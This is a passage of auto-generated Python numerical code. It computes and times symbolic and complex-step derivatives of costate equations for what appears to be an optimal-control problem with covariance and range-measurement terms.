(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
print(fx)
tock = toc()
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_s*(1.0e-50*1j + x_n) - xb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_s*(1.0e-50*1j + x_n) - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p12_n*p12_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p22_n*p22_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)) - p23_n*p23_s*(y_s*(1.0e-50*1j + y_n) - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2) + p13_n*p13_s*(y_s*(1.0e-50*1j + y_n) - yb)/sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_s*(1.0e-50*1j + y_n) - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_s*(1.0e-50*1j + theta_n))**2 - 2*p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_s*(1.0e-50*1j + theta_n))**2 + p13_n*p13_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) + p23_n*p23_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_s*(1.0e-50*1j + theta_n)) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamX_N*(ep*u_max*cos(w) + v*cos(theta_s*(1.0e-50*1j + theta_n))/x_s) + lamY_N*v*sin(theta_s*(1.0e-50*1j + theta_n))/y_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s)/1e-50),
